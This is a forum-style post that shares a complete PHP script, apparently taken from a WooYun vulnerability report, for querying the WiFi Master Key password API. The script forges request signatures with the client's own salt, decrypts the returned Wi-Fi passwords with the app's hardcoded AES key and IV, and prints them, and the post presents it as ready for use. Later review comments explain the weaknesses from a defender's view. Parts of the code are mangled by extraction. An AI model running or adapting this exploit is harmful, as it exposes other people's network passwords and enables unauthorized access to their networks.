
No bullshit, posting the code directly for everyone:

<?php //some code from http://www.wooyun.org/bugs/wooyun-2015-099268
// Script body: for one fixed BSSID/SSID pair it calls request () twice and prints every
// entry found under qryapwd->psws in the second response.
// NOTE(review): what this listing shows for defenders is that the service's protection rests on
// values the client itself holds: the request signature comes from sign () over the posted
// fields, and the decryption key and IV are default arguments of decryptstrin (). Material
// shipped inside a distributed client is not a secret.
// NOTE(review): the listing was damaged by page extraction and is kept byte-identical here.
$bssid="c8:3a:35:fa:b8:80";
$ssid="podinns2f03";
// NOTE(review): both variables are assigned literals just above, so this isset () guard is always true.
if (isset ($bssid)&&isset ($ssid)) {
//update salt: the first call is signed with a throwaway md5 (rand ()) value; the retsn field of
//its response is then used as the salt for the second call
   $ret=request ($bssid, $ssid, md5 (rand (1, 10000)));
   // NOTE(review): request () returns whatever curl_exec () gave back, which may be false;
   // json_decode () then yields null and the property reads below fail. Nothing checks for that.
   $ret=json_decode ($ret);
   $ret=request ($bssid, $ssid, $ret->retsn);
   $ret=json_decode ($ret);
   // Outer retcd is the status of the whole call; the nested qryapwd->retcd is the status of the
   // query itself. Both are compared loosely (==) against 0.
   if ($ret->retcd == 0) {
     if ($ret->qryapwd->retcd == 0) {
       $list=$ret->qryapwd->psws;
       foreach ($list as $wifi) {
         echo "ssid:". $wifi->ssid. "\ n";
         // The pwd field is the only one passed through decryptstrin (); the others are printed as received.
         echo "pwd:" .decryptstrin ($wifi-&p;pwd). "\ n";
         echo "bssid:". $wifi->bssid. "\ n";
         // xuser/xpwd are printed only when xuser is truthy; their meaning is not established by this file.
         if ($wifi->xuser) {
           echo "xuser:". $wifi->xuser. "\ n";
           echo "xpwd:". $wifi->xpwd. "\ n";
         }
       }
     }
     else {
       // Query-level failure: print the server's message as received.
       echo $ret->qryapwd->retmsg;
     }
   }
}
/**
 * Builds the form fields for one API call, signs them with sign (), and POSTs them.
 *
 * @param string $bssid BSSID placed in the "bssid" field.
 * @param string $ssid  SSID placed in the "ssid" field.
 * @param string $salt  Value appended to the concatenated fields inside sign ().
 * @param string $dhid  Value for the "dhid" field; defaults to a fixed literal
 *                      (presumably a device identifier; not established by this file).
 * @return mixed The raw return value of curl_exec (): the response body, or false on failure.
 *
 * NOTE(review): the endpoint is plain http://, so the posted fields and the response travel
 * unencrypted and unauthenticated. Certificate verification is also switched off and redirects
 * are followed, so a redirect to an https:// URL would be accepted without validating the peer.
 * NOTE(review): no curl error is checked; callers receive false unannounced.
 */
function request ($bssid, $ssid, $salt, $dhid="ff8080814cc5798a014ccbbdfa375369") {
   $data=array ();
   // Every field except bssid, ssid and dhid is a fixed literal (ii, mac, uhid, v, ...);
   // their meaning is not documented anywhere in this file.
   $data ["appid"]="0008";
   $data ["bssid"]=$bssid;
   $data ["chanid"]="gw";
   $data ["dhid"]=$dhid;
   $data ["ii"]="609537f302fc6c32907a935fb4bf7ac9";
   $data ["lang"]="cn";
   $data ["mac"]="60f81dad28de";
   $data ["method"]="getdeepsecchkswitch";
   $data ["pid"]="qryapwd:commonswitch";
   $data ["ssid"]=$ssid;
   $data ["st"]="m";
   $data ["uhid"]="a0000000000000000000000000000001";
   $data ["v"]="324";
   // The signature is computed before "sign" is added, so it covers only the fields above.
   $data ["sign"]=sign ($data, $salt);
   $curl=curl_init ();
   curl_setopt ($curl, curlopt_url, "http://wifiapi02.51y5.net/wifiapi/fa.cmd");
   curl_setopt ($curl, curlopt_useragent, "wifimasterkey/1.1.0 (mac os x version 10.10.3 (build 14d136))");
   curl_setopt ($curl, curlopt_ssl_verifypeer, false);//disables TLS peer-certificate verification
   curl_setopt ($curl, curlopt_returntransfer, true);//return the body from curl_exec () instead of printing it
   curl_setopt ($curl, curlopt_post, true);//send as POST
   curl_setopt ($curl, curlopt_postfields, http_build_query ($data));//url-encoded form body built from $data
   curl_setopt ($curl, curlopt_followlocation, true);//follow any redirect the server returns
   $r=curl_exec ($curl);
   curl_close ($curl);
   return $r;
}
/**
 * Unfinished stub: assembles the same field set as request () and signs it with a
 * fixed salt, then discards the result. Nothing is sent and nothing is returned.
 *
 * NOTE(review): $bssid, $dhid and $ssid are neither parameters nor globals of this
 * function, so they are undefined here and evaluate to null. No call to this function
 * is visible anywhere in the listing.
 */
function registernewdevice () {
   $salt="1hf%5yh&7og $1wh! 6vr&7rs! 3nj #1aa $";
   $data=array (
      "appid"=>"0008",
      "bssid"=>$bssid,
      "chanid"=>"gw",
      "dhid"=>$dhid,
      "ii"=>"609537f302fc6c32907a935fb4bf7ac9",
      "lang"=>"cn",
      "mac"=>"60f81dad28de",
      "method"=>"getdeepsecchkswitch",
      "pid"=>"qryapwd:commonswitch",
      "ssid"=>$ssid,
      "st"=>"m",
      "uhid"=>"a0000000000000000000000000000001",
      "v"=>"324"
   );
   // Signed over the fields above only; the signed array never leaves this function.
   $data ["sign"]=sign ($data, $salt);
}
/**
 * Computes the request signature: the field values, ordered by key, are joined
 * without any separator, the salt is appended, and the upper-cased MD5 hex digest
 * of that string is returned.
 *
 * The array is received by value, so the caller's copy is not reordered.
 * The original comment notes that ksort () mirrors the Arrays.sort call in the APK.
 *
 * NOTE(review): this is a plain MD5 over concatenated data, not a keyed MAC, and the
 * values are joined without delimiters, so different field sets can produce the same
 * input string. In this file the salt is either a throwaway random value, a value
 * returned by the server, or a literal in the client, so the signature does not
 * authenticate the client.
 *
 * @param array  $array Field name => value pairs to sign.
 * @param string $salt  Suffix appended before hashing.
 * @return string 32-character upper-case hex digest.
 */
function sign ($array, $salt) {
   ksort ($array);
   $joined=implode ("", $array);
   return strtoupper (md5 ($joined. $salt));
}
/**
 * Decrypts one stored password field and strips the framing around the password.
 *
 * @param string $str        Encoded ciphertext; it is converted with pack () before decryption.
 * @param string $keys       Cipher key; defaults to a fixed literal.
 * @param string $iv         CBC initialisation vector; defaults to a fixed literal.
 * @param mixed  $cipher_alg mcrypt cipher identifier; defaults to the Rijndael-128 constant.
 * @return string The trimmed plaintext without its first 3 and last 13 characters.
 *
 * NOTE(review): the key and IV are constants carried by the client, so this step is
 * obfuscation rather than confidentiality. One IV is reused for every record and CBC has
 * no integrity check, so tampered ciphertext is not detected.
 * NOTE(review): the mcrypt extension was deprecated in PHP 7.1 and removed from core in PHP 7.2.
 */
function decryptstrin ($str, $keys="k%7ve #8ie! 5fb&8e", $iv="y! 0oe #2wj #6pw! 3v", $cipher_alg=mcrypt_rijndael_128) {
   //wi-fi master key password is encrypted by aes/cbc/nopadding
   //plaintext layout: [length] [password] [timestamp]
   $decrypted_string=mcrypt_decrypt ($cipher_alg, $keys, pack ("h *", $str), mcrypt_mode_cbc, $iv);
   // trim () drops surrounding whitespace and NUL bytes; substr () then removes 3 leading and
   // 13 trailing characters, presumably the length prefix and the timestamp from the layout above.
   return substr (trim ($decrypted_string), 3, -13);
}?>

Is the above code simple? The code for the WiFi Master Key password query interface is all written out. Hope you like it.
